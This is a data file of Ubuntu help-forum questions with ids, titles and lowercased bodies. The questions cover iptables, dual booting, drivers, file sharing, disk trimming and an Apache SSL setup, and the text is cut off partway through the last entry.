418653	iptables-save output has unfamiliar style	when i execute iptables-save i get output that looks like this : *nat : prerouting accept [ 25:1601 ] : input accept [ 43:2681 ] : output accept [ 2:144 ] : postrouting accept [ 2:144 ] the last time i worked with these tables i used to see output that looked more like this : -a input -p tcp -- dport 80 -j accept -a input -p tcp -- dport 443 -j accept some rules are still readable but most are incomprehensible . how can i revert the output of iptables-save to the familiar syntax ? fwiw : it does work and my rules are being read correctly but i am unable to remove a rule because it says there is no match : iptables -d input -p tcp -- dport 8000 -j accept this is the same syntax that i used to add the rule in the first place ( with a -a )
418654	unable to see minimized windows	i am ca n't see minimized window in gnome 3.4 , after having install gnome 3.10 using tasksel . i had received an error too : wnckletfactory : :windowlistapplet
418656	monitor and permit or disallow internet traffic	i 've seen something similar to the following : when a program requests a resource from the internet , i get an alert of the contents of this , and whether to allow or disallow it .. i could see the contents in understandable way like communication to url xxx using get request with payload ... . what kind of software can do this ? wireshark ? ( if yes , i think its overkill for this task )
418657	how to delete pre installed programs in ubuntu 12.10 ?	i am new to ubuntu . when i was installing ubuntu it downloaded some programs and now it showed that i am low on space in root ( i use dual boot ) and can anyone also tell me how to delete programs , is there a add or remove programs in ubuntu
418658	ubuntu 13.10 + sick beard /etc/fstab	i installed sick beard on ubuntu 13.10 . it is run ok but i can not send the files on nas . i got the `` unable to save the file : 13 `` i mount the share files with the command : //10.152.0.108/sharez1 /mnt/sharez1 cifs username=root , password=my-pass , nocase , noperm , file_mode=0777 , dir_mode=0777 0 0 and the transmission can not open the files . how can i change permissions of the files ?
418659	ubuntu 12.04 lts 64 bit no internet connect	today i decided to try ubuntu 12.04 lts via usb on my current windows 7 machine . i run ubuntu from usb and select trial . i am unable to connect to the internet and i 'm plugged in using my ethernet port . as i 'm new to linux i 'm unsure how or what information i need to provide to get assistance . i apologize in advance if this question has already been answered , but i was unable to find the answer to my question . thanks in advance- is this the data helpful ? i changed the ip ... $ sudo lshw -c nekwork description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:08:00.0 logical name : eth0 version : 03 serial : 00:24:1d:11:1e : e1 size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernetphysical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8168d-1.fw ip=172.xx.xx.xxx latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:43 ioport : ae00 ( size=256 ) memory : fd2ff000-fd2fffff memory : fd2f8000-fd2fbfff memory : fd200000-fd21ffff ubuntu @ ubuntu : ~ $ ifconfig -a link encap : ethernet hwaddr 00:24:1d:11:1e : e1 inet addr:172.16.12.150 bcast:172.16.12.255 mask:255.255.255.0 inet6 addr : fe80 : :224:1dff : fe11:1ee1/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:73 errors:0 dropped:0 overruns:0 frame:0 tx packets:120 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:6918 ( 6.9 kb ) tx bytes:14667 ( 14.6 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:68 errors:0 dropped:0 overruns:0 frame:0 tx packets:68 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:4240 ( 4.2 kb ) tx bytes:4240 ( 4.2 kb ) ubuntu @ ubuntu : ~ $ netstat -rn kernel ip routing table destination gateway genmask flags mss window irtt iface 0.0.0.0 172.16.12.1 0.0.0.0 ug 0 0 0 eth0 169.254.0.0 0.0.0.0 255.255.0.0 u 0 0 0 eth0 172.16.12.0 0.0.0.0 255.255.255.0 u 0 0 0 eth0 buntu @ ubuntu : ~ $ ping -c 3 172.16.12.1 ping 172.16.12.1 ( 172.16.12.1 ) 56 ( 84 ) bytes of data . 64 bytes from 172.16.12.1 : icmp_req=1 ttl=64 time=0.355 ms 64 bytes from 172.16.12.1 : icmp_req=2 ttl=64 time=0.345 ms 64 bytes from 172.16.12.1 : icmp_req=3 ttl=64 time=0.346 ms -- - 172.16.12.1 ping statistics -- - 3 packets transmitted , 3 received , 0 % packet loss , time 1998ms rtt min/avg/max/mdev = 0.345/0.348/0.355/0.022 ms ubuntu @ ubuntu : ~ $ ubuntu @ ubuntu : ~ $ ping -c 3 www.google.com ping : unknown host www.google.com ubuntu @ ubuntu : ~ $ sudo route del -net 169.254.0.0 netmask 255.255.0.0 eth0 then see again with ping -c 3 www.google.com and test internet ubuntu @ ubuntu : ~ $ sudo route del -net 169.254.0.0 netmask 255.255.0.0 eth0 siocdelrt : no such process ubuntu @ ubuntu : ~ $ sudo route del -net 169.254.0.0 netmask 255.255.0.0 eth0 siocdelrt : no such process ubuntu @ ubuntu : ~ $ ping -c 3 www.google.com ping : unknown host www.google.com
418662	logitech wireless touch keyboard k400r not working synclient lockeddrags=1	i buy this logitech : http : //www.logitech.com/en-hk/product/wireless-touch-keyboard-k400r2 ? wt.ac=ps % 7c11080 % 7ck400wh % 7chp but not working on a terminal this command : synclient lockeddrags=1 i use it on my laptop dell inspiron 1750 x86 with ubuntustudio 13.10 and working fine with the built in touchpad , and the same with an external iogear keyboard , but with the logitech external not working . some of us know how to make working locked drags feature
418664	no sound on hp compac dc5800 with ubuntu 13.10	everything is in the title . i tried previous solutions like adding : options snd-hda-intel model=hp-dv5 to /etc/modprobe.d/alsa-base.conf but obviously it is not the right model or ubuntu-version . could anyone tell me the code for my computer model , or any other solution ? besides , in alsamixer , the card does n't show up . looking forward to your answers ...
418665	lubuntu citrix - exit full screen	i am not able to exit/restore the full screen from citrix reciever ( version 12.1 ) . using key combination of cntrl + f2 , i can switch back to host 's ( lubuntu ) desktop , but unable to exit/restore full screen of remote desktop ( windows ) .
418666	update-grub command not found	i 'm trying to update my grub config on ubuntu server 12.04.3 to include the grub_recordfail_timeout variable as described here : https : //help.ubuntu.com/community/grub2 . the procedure says run update-grub after making the change but it 's does n't appear to be on my system . how can i install this ?
418673	how to easily install mail server in ubuntu 12.04	okay i have been trying for the past hour and had to reinstall the os because it would not turn on anymore . i really need help i have the domain domain.com and i can edit the dns on the host now i need to be able to send and receive emails from domain.com if i have support @ domain.com it needs to be able to send and receive , not just a forwarder i have ubuntu , i just do n't know how to get it working . any help is much appreciated
418681	aliased rm , how do i also alias sudo rm	i aliased rm to a echo use del or full path to rm to save myself from accidental rm ( just lost my $ home to it ) . but sudo rm still uses /bin/rm . how can i alias it to also print same message ? ps : del is alias to trash-put
418684	tried all methods of dual booting ubuntu but all in vain	i am new to ubuntu and want to install it on my dell 15r 5521 laptop . i want to study os and it as a part of my coursework . i tried all the methods which i could get from askubuntu.com to install but all in vain . i am in bit hurry because i got to study from it . if not done i would have to install vmware and run it which i do n't want to . i have done following steps : created a different partition on windows 8 using disk management . created a ubuntu usb stick using unetbootin and ubuntu 12.04.4 lts image . turned the fast startup off from power options in control panel . change the uefi settings secure boot on / off ( both ) and uefi enabled / disabled ( both ) . all combinations . the problem is when i try to restart my computer it does not boot from usb stick . i can not find the the option of booting from usb device anywhere . i tried to do that in legacy mode in which i could find an option to boot from usb but it did not boot from usb stating the error `` no bootable os found and unplug all the drives '' . i had only the ubuntu usb stick connected to my laptop . please guide me . thanking everyone in advance .
418685	ca n't play sound ( teufel concept c )	i want to use my speakers but ubuntu does not recognize my teufel concept c properly . what do i have to do in order to get it running ? i 've read that using sound modules might help but since i 'm a ubuntu-noob , i 'm a bit scared concerning looking into setting those module ( s ) up and running . best regards , hanky
418686	run libreoffice on background	i installed libreoffice on ubuntu 13.10 server from terminal now i have to run it with the command like this /usr/bin/soffice -accept= '' socket , host=localhost , port=8100 ; urp ; staroffice.servicemanager '' -headless -norestore -nologo -nofirststartwizard but it dont work correctly peiman @ server : ~ $ sudo netstat -nap | grep office unix 3 [ acc ] stream listening 2794171 4301/soffice.bin /tmp/osl_pipe_1000_singleofficeipc_84166f53c65d9ded4d416e24fa9b5d8 what can be wrong with this ? !
418689	dual boot : gparted shows unallocated	i have been searching and reading about my problem ( askubuntu has a nice feature where it suggests threads/questions when you type your question title ) , but i am not sure if they are the right solution . so here goes : problem : linux live usb/cd ( e.g . ubuntu ) shows my main partition as `` unallocated '' . due to this , i am unable to resize my main partition for me to create a new partition for me to install another operating system . i know that the best fix is reformat/re-install of my windows 7 partition , but that is not an option for me right now . i want to explore all my options first , and will resort to that as a `` last effort '' . i intend to install with ubuntu 12.04 . been a long-term user , but i wanted to be careful with this situation , as i 'm doing this for a friend . likely cause : i removed the cmos battery , which caused the bios settings to be set to defaults , where the default sata mode is `` raid '' . i had to set it back to `` ide '' in bios upon putting back the cmos battery . planned objective : be able to fix the issue without reformatting/re-installation . partition details : 1 . number of partitions : two ( 2 ) - one for hidden `` system recovery '' ( automatically created in windows 7 installation ) and one which is the actual `` main ' partition . 2 . current os installed : windows 7 professional 32-bit 3 . laptop model : dell latitude e6330 4 . can currently boot to ms windows ? yes . 5 . can boot live cd/usb ? yes . 6 . has access to `` administrator '' account in ms windows ( or any user that has admin rights ) ? no . 7 . willing to re-install windows os ? no . steps taken to attempt to resolve : this is how my partition looked like initially , upon checking in gparted ( that 's not mine , but it 's the same scenario ) : ... here 's how it looks like in `` disk utility '' : i tried to follow the steps from this askubuntu thread : problems installing ubuntu 13.10 alongside windows 7 - gpart shows unallocated space . result : typed this command from live session : sudo fixparts /dev/sda saw this message : notice : gpt signatures detected on the disk , but no 0xee protective partition ! the gpt signatures are probably left over from a previous partition table . do you want to delete them ( if you answer 'y ' , this will happen immediately ) ? ( y/n ) : i selected `` y '' and then `` q '' ( without the quotes ) , as per the fixparts manual/tutorial : if you 're not sure whether to delete the gpt data , do n't do it ; type n , exit from the program by typing q at the main prompt , and investigate further . if you 're certain you want to keep just the mbr partitions , go ahead and type y . if the stray gpt data was your only problem , you can then exit from the program by typing q , leaving the original mbr partition table untouched , although the errant gpt data will now be gone . this is now the resulting image of my gparted : i checked via terminal and here is what i have : '' fdisk -l '' output . i 'm aware of the error i highlighted in bold . i thought that simply running `` fixparts '' would have solved it , just like the same thing that this guy did . it @ it : ~ $ sudo fdisk -l disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x657fe8a0 device boot start end blocks id system /dev/sda1 * 2052 718199 358074 7 hpfs/ntfs/exfat **partition 1 does not start on physical sector boundary . ** /dev/sda2 718200 976770467 488026134 7 hpfs/ntfs/exfat '' blkid '' output : it @ it : ~ $ sudo blkid /dev/loop0 : type= '' squashfs '' /dev/loop1 : label= '' casper-rw '' uuid= '' 950426d4-64f9-d24f-b109-1b844d2c1342 '' type= '' ext2 '' /dev/sda1 : label= '' system reserved '' uuid= '' 42e0650ee0650a0d '' type= '' ntfs '' /dev/sdb1 : label= '' multiboot '' uuid= '' 0cf0-1c45 '' type= '' vfat '' it @ it : ~ $ '' fdisk /dev/sda '' output : it @ it : ~ $ sudo fdisk /dev/sda the device presents a logical sector size that is smaller than the physical sector size . aligning to a physical sector ( or optimal i/o ) size boundary is recommended , or performance may be impacted . command ( m for help ) : m command action a toggle a bootable flag b edit bsd disklabel c toggle the dos compatibility flag d delete a partition l list known partition types m print this menu n add a new partition o create a new empty dos partition table p print the partition table q quit without saving changes s create a new empty sun disklabel t change a partition 's system id u change display/entry units v verify the partition table w write table to disk and exit x extra functionality ( experts only ) command ( m for help ) : p disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x657fe8a0 device boot start end blocks id system /dev/sda1 * 2052 718199 358074 7 hpfs/ntfs/exfat partition 1 does not start on physical sector boundary . /dev/sda2 718200 976770467 488026134 7 hpfs/ntfs/exfat command ( m for help ) : x expert command ( m for help ) : m command action b move beginning of data in a partition c change number of cylinders d print the raw data in the partition table e list extended partitions f fix partition order g create an irix ( sgi ) partition table h change number of heads i change the disk identifier m print this menu p print the partition table q quit without saving changes r return to main menu s change number of sectors/track v verify the partition table w write table to disk and exit expert command ( m for help ) : f nothing to do . ordering is correct already . expert command ( m for help ) : v partition 1 does not start on physical sector boundary . remaining 4751 unallocated 512-byte sectors expert command ( m for help ) : p disk /dev/sda : 255 heads , 63 sectors , 60801 cylinders nr af hd sec cyl hd sec cyl start size id 1 80 32 37 0 179 63 44 2052 716148 07 partition 1 does not start on physical sector boundary . 2 00 180 1 44 254 63 1023 718200 976052268 07 3 00 0 0 0 0 0 0 0 0 00 4 00 0 0 0 0 0 0 0 0 00 expert command ( m for help ) : by the way , i do not have administrator rights in ms windows , so i am unable to access and use `` disk management '' . i worked around it by using my windows 8 installer which has `` dart '' ( disaster and recovery tools ) , hence i was able to use explorer , disk management , and command line/dos box . again , i am able to use ms windows normally while i am having this `` issue '' . i find it really odd . any help would be much appreciated . additional information : here are some pictures that may help . i 'm surprised that even in ms windows tools ( i.e . disk management , dart ) it is listed as `` unallocated '' or `` unrecognized '' , and yet i can boot ms windows normally and use it .
418690	dual boot ubuntu 12.04 & windows 8.1 problem	i have ubuntu and windows 8.1 in separated hdds . my windows 8.1 pro installation is an upgraded windows 7 home premium one , so , it 's installed as the same way as windows 7. now , i installed ubuntu because my computer is having random power issues due to a 10 years old power supply . i have grub2 as the main bootloader ( because windows always showing bsod while in power issues ) . now the power problems are fixed , but i ca n't boot windows 8.1 pro from grub2 ( i can boot ubuntu of course ) , there 's no errors to show or any bsod , just the windows logo without loading anything , i tried loading directly from de hdd in my motherboard settings to windows 8.1 pro without using grub2 and worked without any problem . i think it is a problem with the windows 8 entry in the grub2 config , there 's any way to fix this ?
418692	how to open encrypred usb flash drive in wine ?	i have an encrypted integral usb stick with lockv231.exe i was hoping that i may be able to use it in kubuntu ( 12.4 ) through wine , but when i right-click lockv231.exe and select : 'open with wine windows program loader' i get a message saying : '' please insert the device or run this utility as privileged user . '' how can i load lockv231.exe into wine with admin privileges ?
418695	internet does not connect to anything other than skype and steam chat	my internet has been unable to connect to anything other than the skype chat system as well as the steam chat . any connections through chrome return : error code : err_name_resolution_failed i 've already tried setting my dns to 8.8.8.8 and that did n't change anything , though i changed it by adding it to the additional dns and i 'm not quite sure if that is right .
418696	ca n't write file to server via either samba or nfs	i have setup ubuntu 12.0.4 server 32-bit on a home pc and am trying to simply share a basic file directory on that server for read-write access from a unbuntu 12.0.4 64-bit client ( via nfs and samba - and only reason i 'm trying both is that i ca n't get nfs to work , so tried samba , and both are giving me the same results 'permission denied ' ) . in both instances from the client ( nfs and samba ) i can successfully connect to the fileshare , but both nfs and samba 'tell me ' i ca n't write to it 'permission denied ' . i 've tried to avoid the server side chmod 777 route and give anyone god access to destroy all of my server files in one click , so i 'm looking for ( what i 'm hoping is ) a more sophisticated and appropriate approach to do this .
418698	after update of 12.04 my video plays at faster than nrml speed and no sound , anywhere	after one of the latest updates i have no sound at all . rythmbox , smplayer or anything on internet . hulu , netflix , cbs.com videos also play at like 5 times speed . i have a dual boot with win7 and no probs in win 7 i also have lost the some of the screen resolution ratios in appearance . my pc is connected to a 47 '' visio tv . i can no longer access a proper resolution to fit my screen properly . this set up has worked just fine for the past 4 years until one of the latest updates last week , early feb. this is the 2nd time asking for help . i 'm only a gui user type and do n't know commands for the termial mode so if you need something please be specific with the commands . thanks ken
418699	how to reduce consumed disk space for a 942 mb 13.10 amd64 server minimal install ?	the goal is to have a have a headless server installation on a physical machine that only serves one service . in other words the server is dedicated to run a single task . you could also call this a bare metal appliance . the service requires oracle/sun java version 6 or 7 . the wish is that the ubuntu installation is trimmed down in hard disk space . secondary goal beside low disk space usage is less security updates to be installed for components that are not even used . result : less reboots , and lower down time . jeos no longer exists . a virtual machine installation does not apply , as this installation will run on physical hardware . ubuntu-13.10-server-amd64 `` f4 minimal installation '' with `` openssh-server '' and `` unattended-upgrades '' still consumes 942 mb . after purging unnecessary packages with sudo apt-get purge accountsservice apparmor console-setup eject ftp fuse geoip-database info iputils-tracepath iso-codes kbd krb5-locales language-selector-common laptop-detect locales man-db manpages memtest86+ mtr-tiny ntfs-3g os-prober parted plymouth-theme-ubuntu-text popularity-contest ppp pppconfig pppoeconf rsync sgml-base tasksel telnet ufw vim-common xauth xkb-data xml-core there are 881 mb to remain . how to install ubuntu or trim down an existing installation to consume minimal hard disk drive space ?
418700	after first instalation i get system program problem detected,	and after hiting cancel my desktop wont start it stais black and y have the x cursor mooving how i want and that 's it cant do anything . please help me ! i am noob
418702	ubuntu server installation in a macbook	i have a relatively old macbook that i would like to recycle as a ubuntu linux server . however the laptop has only a partially working keyboard ( not all the keys , and notably , but not only , the left and right arrows and the return keys , are not working ) . therefore i would like to make a headless installation ( via ssh ) or a network installation . i 've done the former on a raspberry pi and it worked great . i am trying to connect the old macbook to my working mac through ethernet . in order to do so , i shared my working mac 's ethernet port with internet sharing ( that is what i did with the raspberry pi and it worked great ) . i have downloaded and dd 'd a thumb drive with the ubuntu-13.10-server-amd64.iso file ( sudo dd if=ubuntu-13.10-server-amd64.iso of=/dev/rdisk3 ) . unfortunately , the thumb drive is not writable . chmod-ing the files do not work : the whole disk is viewed as a cd-rom . the recyclable mac has refind installed and recognizes the thumb drive with ubuntu-server 13.10 and i 'm even able to start the computer on it . however i am stuck because of the faulty keys , hence the idea to install via ssh ... the questions are : is there a way to make a non-writable usb thumb drive writable ? i would like to circumvent some of the installation phases as suggested on this website : http : //www.conrad.id.au/2012/06/installing-linux-on-headless-hp.html is there another way to install ubuntu-server 13.10 , like via network , if yes , is there a step-by-step description on how to do that ( reminder : installation is done from a mac to another mac ) . thanks in advance for any answer , pdeli : ) ++++
418704	will steam work as good in other desktop flavors as it runs on ubuntu ?	it 's great news that steam supports linux , and will surely help with gaming on linux . i 've heard that ubuntu is the distro that steam officially supports , so it follows that you 'd have the best steam experience on ubuntu . my question is this : would any of the differences that make lubuntu what it is and not ubuntu , affect the quality of experience i would get with steam ?
418705	should unity 8 have extensions for customizability	i belief that unity needs somewhat of a customizability features . what better time to put it in while they are rewriting the code in c++ for version 8 . i think it 's more customizable than the applet features of many desktop environment like kde , xfce , to just name a few , because you can change/add the appearance , layout , functionality of something about it . how could i , or anyone change the layout , and functionality of the kde 's logout dialog ? if you try , nice luck with that , without forking the code . for example , i miss the dodge window feature for the launcher when they remove it in version 5.2 of unity , the default version that comes with ubuntu 12.04 lts , their was a fork of unity that re-added that feature , the problem was the person/team who fork it needed to fork it . i know there is this one extension for gnome-shell that allows you to auto-hide the top panel . there is no truly way to theme unity to the fullest it could be done like the menus . the best thing about extensions is that the unity team do n't need to maintain them , the community will do it . just look at how many there are for gnome-shell in the user repos https : //extensions.gnome.org/ . you may miss the applets of gnome 2 , just wounder about an extension that anable to have that functionality ? what do you think what unity should have for customizability ?
418707	how can i connect to wireless internet in ubuntu through command line captive portal	i dont have my kde or plasma desktop and can only install that by connecting to the network.i have somehow removed the plasma desktop with accident . i am a noob so please help
418708	canon mx320 printer does n't print any more	i have canon pixma mx320 printer , that used to print ok in ubuntu 12.04 ... after i uninstalled kde plasma ( i made back up before that ) it stopped working ... i suppose i uninstalled canon drivers ... is it possible to restore just appropriate canon drivers or should i install them again ( i forgot the procedure ) ?
418711	why there are button areas defined for my apple magic trackpad though xorg 's default config disabled them ?	i wanted to configure my apple magic trackpad and came to a point where i realised there were button areas defined in the right top and bottom corner . i tried to disable these by the suggested synclient options rtcornerbutton and rbcornerbutton with no success . checking the system default files in /usr/share/x11/xorg.conf.d/ i noticed it should not be necessary to manually disable them for apple products . these are the trailing lines of /usr/share/x11/xorg.conf.d/50-synaptics.conf : # this option disables software buttons on apple touchpads . # this option is only interpreted by clickpads . section `` inputclass '' identifier `` disable clickpad buttons on apple touchpads '' matchproduct `` apple|bcm5974 '' matchdriver `` synaptics '' option `` softbuttonareas '' `` 0 0 0 0 0 0 0 0 '' endsection why are these button areas active ?
418714	file sharing set up for ubuntu 13.10	i have a new , home-built htpc computer with ubuntu 13.10 installed . i 'm using it to run xbmc . i have a 120 gb ssd drive for the operating system and programs , and a 2 tb drive for media storage . i 've installed samba and followed the procedures in ubuntu 12.04 documentation for samba file server , with the exception of changing drive ownership which i could n't do . i set up one shared folder on the 120gb drive , and three shared folders on the 2tb drive . i 'm having the following problems . i can access the public folder on the main drive using a second user account entitled `` sharer '' . when i try to connect using my ubuntu admin account from either an apple or windows machine , it wo n't allow me to . when i 'm connected as `` sharer '' , i can not access the folders on the 2tb drive . the drive is owned by me , but i 'm unable to change the ownership or permissions . what do i need to do to make things work . how can i change the drive ownership and permissions ?
418716	how can i increase the number of files remembered by gimp ?	as of now , gimp 2.8 remembers just ten recent works in the `` file '' - > '' open recent '' menu . is there any way to increase this number ? i did it in gedit and i think it 's possible in gimp too .
418717	erased grub config by accident , can not boot into windows partition	just this morning i wiped my linux partition into free apace . however , i believe i may have deleted my grub config files , so i can not boot into my windows partition . when i try starting my machine , i get a no such partition error and then a grub rescue > prompt . has this hpened to anyone else ? i 'm completely baffled as to what to do next . i can not reinstall windows because i do n't have a cd . please help .
418721	error while loading shared libraries , but i 've installed the libraries	i 've been trying to get psychonauts to run on my computer for over a month now . i previously posted here , but even after following those directions i am still stuck . i have successfully installed the missing package that psychonauts cites when as the reason for not running : usagiyojimbo @ usagi : ~/psychonauts $ sudo apt-get install libstdc++6 reading package lists ... done building dependency tree reading state information ... done libstdc++6 is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . however , when i try to run the program it still responds exactly the same way . here is the ls : usagiyojimbo @ usagi : ~/psychonauts $ ls displaysettings.ini libsdl-1.2.so.0 psychonauts.png documents psychonauts readme-linux.txt icon.bmp psychonautsdata2.pkg uninstall-psychonauts.sh libopenal.so.1 psychonauts manual win.pdf workresource i have been doing this : usagiyojimbo @ usagi : ~/psychonauts $ ./psychonauts ./psychonauts : error while loading shared libraries : libstdc++.so.6 : can not open shared object file : no such file or directory what am i doing wrong ?
418727	updating to/installing ubuntu 12.04 from 11.10	i would like to upgrade my pc from 11.10 to 12.04 . i tried to upgrade when i kept getting messages that 11.10 unsupported now . my pc crashed and i had to reinstalled 11.10 i made a boot disk for 12.04 ( 64 bit ) and tried running it . it appears to be starting ok. and get various messages flashing on screen till starting network connection manager [ ok ] starting crash report submission daemon [ ok ] after a while a grey screen opens with a mouse pointer , then it goes blank and hangs . ctrl-alt-delete shuts it down . pc has 969mb memory amd sempron processor 3100+ graphics vesa 6330 ( on board ) current os is 11.10 32 bit ( i tried 32 bit 12.04 with similar results ) disc has 122gb but not relevant for live cd running ?
418732	how to start a program without interrupting my current session ?	i'am working on some code or document and i need an additional program like intellj e.g . how can i start this program in the background without popping up and interrupting me on my work ? often i start something to have it ready after i finished reading .
418737	minidlna ubuntu 13.10 server : start on boot	i 'm trying to build a server with minidlna installed . installation worked fine , but having it run on startup is more problematic . i added minidlna to my rc.local , and now on boot i get log messages stating : minidlna.c:132 : error : bind ( http ) : address already in use minidlna.c:1004 : fatal : failed to open socket for http . exiting i have tried setting the bind device ( eth0 ) , and changing the port , which is now 8300 instead of 8200 . all in vain . and , even more unsettling : when i start minidlna manually from the terminal , it runs just fine . this makes me suspect the config is not the problem ; i just can not figure out what is . could somebody give me a suggestion ? thanks a million ! ruud
418738	ubuntu cluster with bridged network on virtualbox - host mac pro - no internet connectivity	i am using virtualbox . my host mac pro . and create 2 vm 's ( ubuntu ) ... i did use bridge network as i want my vm 's to talk as if they are physical connections . i am having issues with internet connectivity.. can you please help me with some tips how to allow the internet connectivity . regards shiv
418741	remember wired network settings - 12.10	i 'm reverse-tethering1 an android device to my pc with ubuntu 12.10 . every time i plug the device , the wired connection is recognised , but i need to open network settings and set the ipv4 method to `` shared to other computers '' . is there a way the device can be remembered/recognised and set the ipv4 method automatically ? 1 . by reverse-tethernig , i mean that the usb tethering is used to provide the android device with an ip address over dhcp , so it can access the pc 's internet connection . however , this question is more general and sounds pretty reasonable for any kind of network connection that you need to plug and unplug frequently ( wireless network details are remembered , for instance , why not have something similar for wired ? ) .
418745	can not shut down on 13.10 and 14.04	13.10 has been re-installed on my i3 . i can not shut down or log out . the power button menu does not help and sudo shutdown -h now also did not help . can you advise ? other suggestions to my query have been tried . i am still unable to log out or shut down . computer spec : cpu : intel® core™ i3-4130 cpu @ 3.40ghz × 4 ; intel® haswell . motherboard : intel round lake dh87rl lga1150 if i select and click on shut down and hold down the power button for a count of 10 , the machine will power off . i have pressed f2 to enter setup when the machine reboots . nothing happens . f7 to enter bios also does nothing . f10 to enter boot menu made the pc freeze . i had to force a shutdown . sudo shutdown -h produced following message . the link is on imgur : imgur.com/ud9ecna i upgraded from 13.10 to 14.04 on 21 april 2014 . the machine still does not shut down . i have to hold down the power button or 14.04 automatically reboots . my kernel is 3.13.0 -24-generic # 46-ubuntu smp thu april 10 19:11:08 utc 2014 x86_64 x86_64 x86_64 gnu linux sudo shutdown -p now or sudo poweroff and sudo shutdown -h now do not help . halt -p produces : '' halt : need to be root . '' sudo halt makes the machine freeze . sudo halt -p does not help . the machine reboots immediately . i did not know how to enter bios . wakeup on lan is disabled . the problem is solved .
418748	how do i setup ssl from a rapidssl on apache2 ?	i recently purchase a ssl cert from rapidssl and i am trying to configure my server to use ssl . i have 3 websites on this server each with their own ip and i just want one to have ssl active . i messed with the default-ssl file trying to follow instructions on how to do it but after an apache restart my website do not show up . also i was not sure which key to use so i used my secure server key i made but i am not sure if thats the correct one ... was i supposed to use the not secure key ? the file /etc/apache2/sites-available/default-ssl : cat default-ssl < ifmodule mod_ssl.c > < virtualhost _default_:443 > serveradmin me @ site1.com servername site1.com:443 documentroot /var/www/site1/ < directory / > options followsymlinks allowoverride none < /directory > < directory /var/www/site1/ > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > allowoverride none options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /ssl_access.log combined alias /doc/ `` /usr/share/doc/ '' < directory `` /usr/share/doc/ '' > options indexes multiviews followsymlinks allowoverride none order deny , allow deny from all allow from 127.0.0.0/255.0.0.0 : :1/128 < /directory > # ssl engine switch : # enable/disable ssl for this virtual host . sslengine on # a self-signed ( snakeoil ) certificate can be created by installing # the ssl-cert package . see # /usr/share/doc/apache2.2-common/readme.debian.gz for more info . # if both key and certificate are stored in the same file , only the # sslcertificatefile directive is needed . sslcertificatefile /etc/apache2/ssl/sslkey.crt # this was sent by email sslcertificatekeyfile /etc/apache2/ssl/server.key # i generated this when requesting the key sslcacertificatefile /etc/apache2/ssl/intermediate.crt # grabbed from thier site # server certificate chain : # point sslcertificatechainfile at a file containing the # concatenation of pem encoded ca certificates which form the # certificate chain for the server certificate . alternatively # the referenced file can be the same as sslcertificatefile # when the ca certificates are directly appended to the server # certificate for convinience . # sslcertificatechainfile /etc/apache2/ssl.crt/server-ca.crt # certificate authority ( ca ) : # set the ca certificate verification path where to find ca # certificates for client authentication or alternatively one # huge file containing all of them ( file must be pem encoded ) # note : inside sslcacertificatepath you need hash symlinks # to point to the certificate files . use the provided # makefile to update the hash symlinks after changes . # sslcacertificatepath /etc/ssl/certs/ # sslcacertificatefile /etc/apache2/ssl.crt/ca-bundle.crt # certificate revocation lists ( crl ) : # set the ca revocation path where to find ca crls for client # authentication or alternatively one huge file containing all # of them ( file must be pem encoded ) # note : inside sslcarevocationpath you need hash symlinks # to point to the certificate files . use the provided # makefile to update the hash symlinks after changes . # sslcarevocationpath /etc/apache2/ssl.crl/ # sslcarevocationfile /etc/apache2/ssl.crl/ca-bundle.crl # client authentication ( type ) : # client certificate verification type and depth . types are # none , optional , require and optional_no_ca . depth is a # number which specifies how deeply to verify the certificate # issuer chain before deciding the certificate is not valid . # sslverifyclient require # sslverifydepth 10 # access control : # with sslrequire you can do per-directory access control based # on arbitrary complex boolean expressions containing server # variable checks and other lookup directives . the syntax is a # mixture between c and perl . see the mod_ssl documentation # for more details . # < location / > # sslrequire ( % { ssl_cipher } ! ~ m/^ ( exp|null ) / \ # and % { ssl_client_s_dn_o } eq `` snake oil , ltd. '' \ # and % { ssl_client_s_dn_ou } in { `` staff '' , `` ca '' , `` dev '' } \ # and % { time_wday } > = 1 and % { time_wday } < = 5 \ # and % { time_hour } > = 8 and % { time_hour } < = 20 ) \ # or % { remote_addr } =~ m/^192\.76\.162\ . [ 0-9 ] + $ / # < /location > # ssl engine options : # set various options for the ssl engine . # o fakebasicauth : # translate the client x.509 into a basic authorisation . this means that # the standard auth/dbmauth methods can be used for access control . the # user name is the `one line ' version of the client 's x.509 certificate . # note that no password is obtained from the user . every entry in the user # file needs this password : `xxj31zmtzzkva ' . # o exportcertdata : # this exports two additional environment variables : ssl_client_cert and # ssl_server_cert . these contain the pem-encoded certificates of the # server ( always existing ) and the client ( only existing when client # authentication is used ) . this can be used to import the certificates # into cgi scripts . # o stdenvvars : # this exports the standard ssl/tls related `ssl_* ' environment variables . # per default this exportation is switched off for performance reasons , # because the extraction step is an expensive operation and is usually # useless for serving static content . so one usually enables the # 